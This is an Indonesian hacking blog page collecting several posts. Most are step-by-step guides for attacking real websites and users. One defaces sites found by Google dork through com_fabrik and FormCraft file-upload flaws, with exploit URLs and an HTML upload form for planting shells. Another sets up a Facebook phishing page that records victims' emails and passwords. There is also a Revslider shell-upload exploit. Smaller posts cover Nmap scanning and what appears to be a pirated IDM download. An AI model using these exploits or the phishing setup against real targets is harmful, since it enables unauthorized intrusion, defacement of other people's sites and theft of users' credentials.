Senin, 30 Maret 2015

Cara Deface Dengan Metode Com_Fabrik

Published on: 08.11 by Antonius Leonardo - No comments

Oke kali ini saya akan me-ngepost "Cara Deface Dengan Metode Com_Fabrik", Yap Cara ini sebenarnya masih menggunakan google dork dan sistem tanam File Upload, Oke langsung saja langkah-langkah-nya

1. Kita pergi ke GOOGLE lalu ketik inurl:index.php?option=com_fabrik

2. Pilih website 1 aja, klo mau deface web lebih banyak pilih lain juga boleh

3. Lalu masukkan exploit ini index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
ex : www.site.com/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

4. Jika sudah berhasil, akan muncul seperti gambar dibawah ini

5. Klik "pilih file/choose" file jika sudah klik "Import CSV"

6. Nanti jika ke halaman lain berarti cari target lain, Nanti jika selesai akan tersimpan di "www.site.com/media/(nama taneman)"

Contoh hasil punya saya http://www.alertnewsnet.org/media/ledat.txt

Sekian...
http://antoniusln-002.blogspot.com/

Cara Menggunakan Nmap

Published on: 08.08 by Antonius Leonardo - No comments

Oke... kali ini saya akan me-ngepost, dan postingan saya kali ini adalah "Cara Menggunakan Nmap"...Oke.. kalau diperbincangkan "Nmap" ini sendiri adalah salah satu alat hacking, penjelasan tentang Nmap dibawah ini :

Arti :
Nmap (“Network Mapper”) merupakan sebuah tool open source untuk eksplorasi dan audit keamanan jaringan. Ia dirancang untuk memeriksa jaringan besar secara cepat, meskipun ia dapat pula bekerja terhadap host tunggal. Nmap menggunakan paket IP raw dalam cara yang canggih untuk menentukan host mana saja yang tersedia pada jaringan, layanan (nama aplikasi dan versi) apa yang diberikan, sistem operasi (dan versinya) apa yang digunakan, apa jenis firewall/filter paket yang digunakan, dan sejumlah karakteristik lainnya. Meskipun Nmap umumnya digunakan untuk audit keamanan, namun banyak administrator sistem dan jaringan menganggapnya berguna untuk tugas rutin seperti inventori jaringan, mengelola jadwal upgrade layanan, dan melakukan monitoring uptime host atau layanan.

Oke.. langsung saja kita ke cara penginstallannya :
1. Install Winpcap versi 2.1 atau versi yang lebih baru, yaitu WinPcap_3_0.exe
2. Reboot
3. Download aplikasi Nmap terbaru dari www.nmap.org,
4. Unzip file tersebut menggunakan Winzip atau utility dekompresi lainnya.

Cara Menggunakan Nmap :
Berikut beberapa contoh teknik yang dapat digunakan menggunakan nmap.

1. Memeriksa port yang terbuka
nmap<host/IP target>

2. Memeriksa spesifik port pada mesin target
nmap -p <host/IP target>

3. Memeriksa service yang berjalan pada port
nmap – sV <host/IP target>

4. Memeriksa port mesin target dalam 1 segmen jaringan
nmap <host/IP target>

5. Mengidentifikasi sistem operasi mesin
    nmap -O <host/IP target>

Contoh setelah kita melakukan nmap adalah sebagai berikut :

root@bt:~# nmap -p 1-65535 -sV -O 172.16.200.20
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-10-14 14:07 WIT
Nmap scan report for 172.16.200.20
Host is up (0.00052s latency).
Not shown: 65521 closed ports
PORT      STATE SERVICE       VERSION
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds?
1025/tcp  open  msrpc         Microsoft Windows RPC
1026/tcp  open  msrpc         Microsoft Windows RPC
1029/tcp  open  msrpc         Microsoft Windows RPC
1031/tcp  open  msrpc         Microsoft Windows RPC
1032/tcp  open  msrpc         Microsoft Windows RPC
1033/tcp  open  msrpc         Microsoft Windows RPC
1091/tcp  open  ff-sm?
2869/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
3389/tcp  open  ms-term-serv?
5357/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
64141/tcp open  tcpwrapped
MAC Address: 70:71:BC:EC:EC:51 (Pegatron)
Device type: general purpose
Running: Microsoft Windows Vista|2008|7
OS details: Microsoft Windows Vista SP0 - SP2, Windows Server 2008, or Windows 7 Ultimate
Network Distance: 1 hop
Service Info: OS: Windows
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 147.29 seconds
root@bt:~#

Sekian...
http://antoniusln-002.blogspot.com/

Download Ubuntu 10.04

Published on: 08.07 by Antonius Leonardo - No comments

Oke.. saya kembali lagi, dan postingan saya kali ini adalah "Download Ubuntu 10.04", Nah sebenarnya ini adalah sistem operasi Linux berbasis Debian, dengan Unity sebagai lingkungan desktop default. Oke langsung saja screenshoot dibawah ini

ScreenShot :


Oke langsung saja link downloadnya dibawah ini :
*Download* (32 bit) << Direct Link
*Download* (64 bit) << Direct Link
#Mirror1 (OfficalSite) << Visit Website

Sekian...

Cara Membuat Phising Facebook

Published on: 07.15 by Antonius Leonardo - No comments

Oke... kali ini saya akan me-ngeshare "Cara Membuat Phising Facebook" ya cara ini digunakan untuk mengmbil email dan pw korban :v sepertinya sih lumayan kalau dapat email sma password korban atau sma saja dengan meng-hack tapi sesudah tau email pw bisa diganti passwordnya, Oke langsung saja tahap-tahapnya

Bahan-bahan :
-Script Phising(download disini)
-Web Hostingan (Jika belum punya daftar dengan akun facebook disini)
-Kesabaran, ketabahan, keseriuSAN!!

Tahap :
1. Kita sudah harus daftar di idHostinger atau hostingan lainnya

2. Kita ke "http://cpanel.idhostinger.com/", Masuk Ke Hostingan kalian pilih file manejer 1

3. Lalu buka file yg didownload tadi, dan hapus semua file bawaan di "file manejer1" anda

4. Lalu blok semua file di file download-an tadi kecuali file "wajibbaca.txt" lalu seret ke file manejer 1

5. Maka hasilnya akan seperti dibawah ini

6. Lalu buka "www.sitemu.(domainmu)" nanti tampilannya akan seperti dibawah ini

7. Lalu coba kamu login dengan email dan password "test", Lalu klik konfirmasi nama, Nah setelah itu kamu     pergi ke "www.sitemu.(domainmu)/hasilkucing.txt" nanti disitu akan tertera hasil email dan passwordnya
Diatas adalah gambar succesnya, cara suksesnya dengan promo di facebook
Selamat Mencoba ^_^, Jika ada masalah itu adalah tanggung jawab anda sendiri JUST4FUN!


Sekian...
http://antoniusln-002.blogspot.com/

Deface Metode FormCraft

Published on: 07.13 by Antonius Leonardo - No comments

Oke... kali ini saya akan me-ngepost "Cara Deface Metode FormCraft", Oke metode ini bisa kita lakukan untuk menebas index, menanam shell, dll, OKE lagsung saja

Bahan :
Dork    : inurl:"wp-content/plugins/formcraft/"

Exploit  : 
[+]wp-content/plugins/formcraft/file-upload/server/php/upload.php
Atau
[+]wp-content/plugins/formcraft/file-upload/server/php/

Script CSRF :
<form method="POST" action="http://localhost/wp-content/plugins/formcraft/file-upload/server/php/upload.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form> {Simpan dengan (*.html)}

Note :
Tulisan yang berwarna orange ganti degan web target kalian!

Langkah-lagkah :
1. Cari web dengan dork diatas

2. Lalu pilih salah satu web

3. Masukkan exploit (contoh : www.example.com/wp-content/plugins/formcraft/file-    upload/server/php/upload.php)

4. Jika Vuln akan tampil seperti ini

5. Tinggal File diedit di script CSRF

6. Buka Script FormCraft tadi, lalu upload file kalian

7. Jika sudah akan terlihat seperti gambar ini
[Image: Screenshot_1.png]

8. Buka web (contoh : www.example.com/mico.php) atau (contoh : www.example.com/wp-content/plugins/formcraft/file-upload/server/php/mico.php)....Selesai


Sekian...

Download IDM v6.22.1.Silent.Install

Published on: 06.59 by Antonius Leonardo - No comments

Oke.!!... kali ini saya nge-post lagi, dan postingan saya kali ini adalah "Download IDM v6.22.1.Silent.Install", Nah.. maksud dari "Silent Install" adalah jadi kita tidak usah registrasi lagi capek-capek juga kalau harus registrasi, karena ini adalah IDM yang sudah FULL di re-pack oleh salah satu website, Oke langsung saja..

Tampilan sesudah dibuka (boleh juga di extract) dibawah ini :

Cara install sudah tertera disitu
Link Download :
*Download*(MediaFire)

Sekian...
http://antoniusln-002.blogspot.com/


Revslider Upload Shell Exploit

Published on: 06.56 by Antonius Leonardo - No comments

Oke... kali ini saya akan mengepost lagi, dan postingan saya kali ini adalah "Revslider Upload Shell Exploit", nah cara ini mungkin menguntungkan, tetapi jangan disalah gunakan

1. Pertama anda harus meng-upload file ini

2. daripada mengumpulkan daftar dan script dan file revslider.zip dalam folder yang sama
 setelah menjalankan script di cmd, nanti gambar akan seperti dibawah ini

Untuk mengcopy scriptnya silahkan klik disini

Sekian...
Langganan: Postingan (Atom)